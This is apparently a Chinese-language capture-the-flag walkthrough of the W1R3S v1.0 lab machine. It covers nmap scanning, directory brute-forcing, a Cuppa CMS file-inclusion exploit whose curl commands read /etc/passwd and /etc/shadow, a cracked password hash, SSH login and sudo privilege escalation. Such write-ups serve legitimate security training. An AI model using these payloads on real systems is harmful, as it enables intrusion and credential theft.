【原創】專案五w1r3s.v1.0

實戰記錄

1、nmap資訊列舉

1）C段掃描

nmap -sP 192.168.186.0/24

2）掃描全埠資訊

nmap -p- 192.168.186.143

3）掃描版本資訊

nmap -p- 192.168.186.143 -sS -sV -A -T5

有用的資訊：

2、目錄爆破

dirb http://192.168.186.143/

查詢出該頁面存在administrator目錄：

http://192.168.186.143/administrator/installation/

發現是Title[Cuppa CMS]框架！CuppaCMS是一套內容管理系統(CMS)!

3、谷歌搜尋：Cuppa CMS exploit
https://www.exploit-db.com/exploits/25971

其實是個檔案包含漏洞，請求中的urlConfig的引數會當做程式碼執行（原來這種也能申請CVE，驚呆。。。）

LINE 22: 
        <?php include($_REQUEST["urlConfig"]); ?>

嘗試通過get拼接，無回顯，因此改用post方式，因為漏洞是

$_REQUEST，兩種方式都是接收的。

curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.186.143/administrator/alerts/alertConfigField.php

發現存在正確回顯，說明驗證檔案包含漏洞成功

接下來就讀取shadow裡面的資訊，因為裡面有登陸的密碼

curl --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.
168.186.143/administrator/alerts/alertConfigField.php

w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

儲存下

使用john來暴力破解密碼，不加密碼本就是用的本地預設密碼本

使用者名稱：w1r3s
密碼：computer

然後進行ssh登陸目標主機

 ssh [email protected]

然後繼續進行linux掃描，這裡用工具linpeas.sh，然後通過wget傳輸

控制端

目標端

執行掃描檔案

可利用的地方是橙色顯示，這裡發現可能可以通過sudo提權

根據提示使用sudo -l，發現許可權都是可以使用的

進一步使用sudo su去提權，發現成功了

獲取flag成功

擴充套件知識

1，定位問題函數

2，控制/etc/sudoers的最低許可權

腦圖